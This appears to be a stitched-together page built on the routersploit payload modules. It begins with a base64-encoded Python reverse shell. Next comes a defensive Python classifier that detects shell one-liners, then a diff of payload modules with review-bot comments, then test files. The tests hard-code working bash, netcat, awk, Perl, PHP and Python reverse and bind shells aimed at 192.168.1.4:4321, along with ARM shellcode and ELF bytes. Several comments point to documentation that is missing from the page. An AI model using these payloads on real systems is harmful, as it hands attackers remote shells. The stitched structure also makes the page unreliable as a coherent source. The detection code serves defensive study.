exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))
```
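Every shell documented above reduces to one of a few constructs: `/dev/tcp/` in Bash, `nc ... -e`, gawk's `/inet/tcp/` special file, or an interpreter evaluating a base64 blob. Those constructs are what a defender hunts for in process-creation logs and shell history. The classifier below is an added example written for this page, not part of routersploit: it matches those idioms across both the `cmd/` one-liners and the bare perl/php/python payloads, decodes the base64 that the eval/exec wrappers carry, and reports whether the record is a bind or reverse shell and which endpoint it uses. The records in `SAMPLES` are constructed: the PHP and Perl blobs are the ones printed in the scenarios above, and the Python one simply encodes `import os` to exercise the decode path for a script with no endpoint.

```python
import base64
import re

# Shell-spawning idioms from the one-liner and payload sections above. Patterns with a
# capture group grab the base64 blob that perl/php/python hand to eval/exec so it can be
# decoded; the others match the socket construct in the command line itself.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
    "netcat_exec": re.compile(r"\bnc\b.*\s-e\s+\S*sh\b"),
    "gawk_inet_socket": re.compile(r"/inet/tcp/\d{1,5}/[\w.]+/\d{1,5}"),
    "perl_b64_eval": re.compile(r"decode_base64\('([A-Za-z0-9+/=]+)'\)"),
    "php_b64_eval": re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)"),
    "python_b64_exec": re.compile(r"exec\('([A-Za-z0-9+/=]+)'\.decode\('base64'\)\)"),
}
# A remote peer written as host/port, host:port, host,port or host port.
ENDPOINT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[\"']?\s*[,:/\s]\s*(\d{1,5})")
# The listening port of the bind variants: nc -lvp, gawk /inet/tcp/<port>/0/0,
# perl LocalPort,<port>, python bind(('0.0.0.0',<port>)).
LISTEN_PORT = re.compile(r"(?:-l\w*p\s+|/inet/tcp/|LocalPort,|0\.0\.0\.0'\s*,\s*)(\d{1,5})")

# Constructed process-creation records modelled on the scenarios above. The PHP and Perl
# blobs are the ones printed there; the Python blob just encodes "import os".
SAMPLES = {
    "bash_reverse": "bash -i >& /dev/tcp/192.168.1.4/4321 0>&1",
    "nc_bind": "nc -lvp 4321 -e /bin/sh",
    "nc_reverse": "nc 192.168.1.4 4321 -e /bin/sh",
    "awk_bind": "awk 'BEGIN{s=\"/inet/tcp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'",
    "awk_reverse": "awk 'BEGIN{s=\"/inet/tcp/0/192.168.1.4/4321\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'",
    "php_reverse": "php -r \"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));\"",
    "perl_bind": "perl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));\"",
    "python_exec": "python -c \"exec('aW1wb3J0IG9z'.decode('base64'))\"",
    "benign": "ls -la /tmp",
}


def decode_blob(blob):
    """Decode a base64 blob to text, or None when it is not well-formed base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except ValueError:
        return None


def classify(cmdline):
    """Return a finding for a suspicious command line, or None when nothing matches."""
    for name, pattern in INDICATORS.items():
        match = pattern.search(cmdline)
        if match is None:
            continue
        decoded = decode_blob(match.group(1)) if match.groups() else None
        # For the eval/exec wrappers the endpoint lives inside the decoded script.
        haystack = decoded if decoded is not None else cmdline
        finding = {"indicator": name, "decoded": decoded, "direction": None, "host": None, "port": None}
        for host, port in ENDPOINT.findall(haystack):
            if host != "0.0.0.0":  # a wildcard bind address is a listener, not a peer
                finding.update(direction="reverse", host=host, port=int(port))
                return finding
        listen = LISTEN_PORT.search(haystack)
        if listen:
            finding.update(direction="bind", port=int(listen.group(1)))
        return finding
    return None


def scan(records):
    """Classify every record; return {name: finding} for the ones that were flagged."""
    flagged = {}
    for name, cmdline in records.items():
        finding = classify(cmdline)
        if finding is not None:
            flagged[name] = finding
    return flagged


if __name__ == "__main__":
    for name, finding in scan(SAMPLES).items():
        where = finding["host"] or "*"
        print(f"{name:13} {finding['indicator']:17} {finding['direction']} {where}:{finding['port']}")
```

Run as a script it prints one line per flagged record and stays silent on the benign one. The `0.0.0.0` special case is there for the Python bind payload, whose decoded source contains `so.bind(('0.0.0.0',4321))`: that address is a wildcard listener rather than a peer, so the record is reported as bind with port 4321 instead of a reverse connection to 0.0.0.0.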
......@@ -11,7 +11,7 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "ARMLE Bind TCP",
"description": "Creates interactive tcp bind shell for ARMLE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
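Review bot: the trailing comma is the whole fix here and it matters: `"authors": ("Marcin Bury <...>"  # comment` followed by `)` is a parenthesised string, not a one-element tuple, so any consumer iterating `__info__["authors"]` would get single characters. Since this identical one-line change is repeated for every payload module in the commit, a single test that loads the modules and asserts `isinstance(__info__["authors"], tuple)` would stop the next new payload from reintroducing it.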
......
......@@ -11,7 +11,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "ARMLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for ARMLE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Awk Bind TCP",
"description": "Creates an interactive tcp bind shell by using (g)awk.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Awk Bind UDP",
"description": "Creates an interactive udp bind shell by using (g)awk.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Awk Reverse TCP",
"description": "Creates an interactive tcp reverse shell by using (g)awk.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Bash Reverse TCP",
"description": "Creates interactive tcp reverse shell by using bash.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Netcat Bind TCP",
"description": "Creates interactive tcp bind shell by using netcat.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Netcat Reverse TCP",
"description": "Creates interactive tcp reverse shell by using netcat.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(PerlBindTCP):
"name": "Perl Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using perl one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......@@ -16,5 +16,5 @@ class Exploit(PerlBindTCP):
def generate(self):
payload = super(Exploit, self).generate()
cmd = "{} -MIO -e '{}'".format(self.cmd, payload)
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload)
return cmd
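Review bot: the switch from `'{}'` to `\"{}\"` is needed because the generated payload now contains single quotes (`decode_base64('...')`) that would have closed the old wrapper early. Double quotes are safe only because nothing inside is shell-expandable: the base64 alphabet has no `$`, backtick, `"` or backslash, and the surrounding `use MIME::Base64;eval(decode_base64(...));` has none either. A one-line comment beside the format string stating that invariant would keep it from being broken by a later edit; the same applies to the identical hunk in the reverse one-liner module.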
......@@ -7,7 +7,7 @@ class Exploit(PerlReverseTCP):
"name": "Perl Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using perl one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......@@ -16,5 +16,5 @@ class Exploit(PerlReverseTCP):
def generate(self):
payload = super(Exploit, self).generate()
cmd = "{} -MIO -e '{}'".format(self.cmd, payload)
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload)
return cmd
......@@ -7,7 +7,7 @@ class Exploit(PHPBindTCP):
"name": "PHP Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using php one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(PHPReverseTCP):
"name": "PHP Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using php one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(PythonBindTCP):
"name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp bind shell by using python one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
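Review bot: unrelated to the comma fix but visible in the context lines: `"name": "Python Reverse TCP One-Liner"` sits on a module whose class is `Exploit(PythonBindTCP)` and whose description says bind shell. The mismatch already leaks into the docs scenario earlier on this page, where the prompt reads `rsf (Python Reverse TCP One-Liner) > set rport 4321`. Suggest `"name": "Python Bind TCP One-Liner"` in this commit and regenerating that scenario block.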
......
......@@ -7,7 +7,7 @@ class Exploit(PythonReverseTCP):
"name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using python one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -11,7 +11,7 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "MIPSBE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSBE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -11,7 +11,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "MIPSBE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSBE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -11,7 +11,7 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "MIPSLE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSLE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -10,9 +10,9 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "MIPSLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSLE architecture.",
"authors": [
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
],
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.MIPSLE
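Review bot: this was the only module carrying `authors` as a list; switching it to a tuple with the trailing comma brings it in line with the other hunks. Neither this normalisation nor the comma fix is mentioned in the commit message (`Adding tests, docs for payloads`, `Fixing AWK Bind UDP payload`), so a line about the `__info__` cleanup would help whoever bisects later.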
......
from base64 import b64encode
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
......@@ -6,17 +7,18 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Perl Bind TCP",
"description": "Creates interactive tcp bind shell by using perl.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
def generate(self):
payload = (
"$p=fork();exit,if$p;foreach my $key(keys %ENV){" +
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
str(self.rport) +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};"
)
return payload
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
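Review bot: two behaviour changes are folded into this hunk and should be called out in the commit message: the `$p=fork();exit,if$p;` prefix is dropped, so the listener no longer detaches from the calling process, and the script is now delivered base64-encoded behind `eval(decode_base64(...))`. With `use IO;` now inside the script, the `-MIO` that the one-liner wrappers prepend is redundant (harmless, but one of the two can go). Minor style point: `str(b64encode(bytes(payload, "utf-8")), "utf-8")` reads more simply as `b64encode(payload.encode()).decode()`.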
from base64 import b64encode
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......@@ -6,13 +7,13 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Perl Reverse TCP",
"description": "Creates interactive tcp reverse shell by using perl.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
def generate(self):
payload = (
"$p=fork;exit,if($p);foreach my $key(keys %ENV){" +
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
self.lhost +
":" +
......@@ -20,4 +21,5 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
)
return payload
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
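Review bot: the format string emits `...('{}'));` with a trailing semicolon, but the docs scenario for `payloads/perl/reverse_tcp` earlier on this page shows the output ending in `'))` without it, so that scenario looks hand-edited rather than captured from this code; regenerate it so the doc, the module and the test vector agree. The fork-removal and base64-wrapping remarks made on the bind variant apply to this hunk as well.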
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "PHP Reverse TCP",
"description": "Creates interactive tcp reverse shell by using php.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Python Bind TCP",
"description": "Creates interactive tcp bind shell by using python.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Python Reverse TCP",
"description": "Creates interactive tcp reverse shell by using python.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
from routersploit.modules.payloads.armle.bind_tcp import Exploit
# armle bind tcp payload with rport=4321
bind_tcp = (
b"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d"
b"\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0"
b"\x8d\xe2\x00\x60\xa0\xe1\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01"
b"\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0"
b"\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d"
b"\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0"
b"\x8d\xe2\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d"
b"\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1"
b"\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0"
b"\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60"
b"\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01"
b"\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0"
b"\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0"
b"\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40"
b"\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07"
b"\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0"
b"\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d"
b"\xe2\x0b\x00\x90\xef"
)
# elf armle bind tcp
elf_armle_bind_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x00\x00\x00\x80\x00\x00\x58\x01\x00\x00\x5c\x02\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x02\x00\xa0\xe3\x01\x10"
b"\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d"
b"\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1"
b"\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01\x1c\xa0\xe1\x07\x18\x81"
b"\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10"
b"\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d\xe9\x02\x00\xa0\xe3\x0d"
b"\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x06\x00\xa0\xe1"
b"\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90"
b"\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20"
b"\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0\xe3\x0d\x10\xa0\xe1\x66"
b"\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x02\x10\xa0\xe3"
b"\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01\x10\x51\xe2\xfb\xff\xff"
b"\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0\x2f\x30\xa0\xe3\x62\x70"
b"\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0\xe3\x07\x38\x83\xe0\x6e"
b"\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40\xa0\xe3\x73\x70\xa0\xe3"
b"\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07\x48\x84\xe0\x73\x50\xa0"
b"\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0\x3e\x00\x2d\xe9\x08\x00"
b"\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d\xe2\x0b\x00\x90\xef"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_armle_bind_tcp
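Review bot: the second assertion feeds the hard-coded expected `bind_tcp` constant into `generate_elf` instead of the bytes the module just produced, so the ELF check never exercises the real generate-then-wrap path; `assert payload.generate_elf(payload.generate()) == elf_armle_bind_tcp` covers it with no loss of strictness, since the first assertion already pins `generate()` to `bind_tcp`. The same pattern is used in the mipsbe, mipsle and x86 ELF tests below.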
from routersploit.modules.payloads.armle.reverse_tcp import Exploit
# armle reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f"
b"\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf"
b"\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92"
b"\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1"
b"\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00"
)
# elf armle reverse tcp
elf_armle_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x00\x00\x00\x80\x00\x00\x9c\x00\x00\x00\xe4\x00\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x01\x10\x8f\xe2\x11\xff"
b"\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06"
b"\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf\x3f\x27\x02\x21\x30\x1c"
b"\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92\x1a\x05\xb4\x69\x46\x0b"
b"\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1\xc0\xa8\x01\x04\x2f\x62"
b"\x69\x6e\x2f\x73\x68\x00"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_armle_reverse_tcp
from routersploit.modules.payloads.cmd.awk_bind_tcp import Exploit
# awk bind tcp payload with rport=4321
bind_tcp = (
"awk 'BEGIN{s=\"/inet/tcp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
from routersploit.modules.payloads.cmd.awk_reverse_tcp import Exploit
# awk reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"awk 'BEGIN{s=\"/inet/tcp/0/192.168.1.4/4321\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
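Review bot: the expected string for the awk reverse shell ends in `close(s)};'` while the awk bind-tcp expectation ends in `close(s)}'`; the stray `;` after the `BEGIN` block is harmless to awk but the test pins it as the module's exact output, so either the module emits it (and the bind variant should match for consistency) or the expectation should drop it.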
from routersploit.modules.payloads.cmd.bash_reverse_tcp import Exploit
# bash reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"bash -i >& /dev/tcp/192.168.1.4/4321 0>&1"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
from routersploit.modules.payloads.cmd.netcat_bind_tcp import Exploit
# netcat bind tcp payload with rport=4321
bind_tcp = (
"nc -lvp 4321 -e /bin/sh"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Exploit
# netcat reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"nc 192.168.1.4 4321 -e /bin/sh"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
from routersploit.modules.payloads.cmd.perl_bind_tcp import Exploit
# perl bind tcp payload with rport=4321
bind_tcp = (
"perl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
from routersploit.modules.payloads.cmd.perl_reverse_tcp import Exploit
# perl reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"perl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
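Review bot: the header comment `# perl reverse udp payload with lhost=192.168.1.4 lport=4321` describes a UDP payload, but the module under test is `cmd.perl_reverse_tcp` and the variable is `reverse_tcp`; change `udp` to `tcp`.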
from routersploit.modules.payloads.cmd.php_reverse_tcp import Exploit
# php reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"php -r \"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
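Review bot: same copy-paste slip as the perl test: `# php reverse udp payload ...` should read `tcp`, matching `cmd.php_reverse_tcp` and the `reverse_tcp` variable it annotates.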
from routersploit.modules.payloads.cmd.python_bind_tcp import Exploit
# python bind tcp payload with rport=4321
bind_tcp = (
"python -c \"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
from routersploit.modules.payloads.cmd.python_bind_udp import Exploit
# bind udp payload with rport=4321
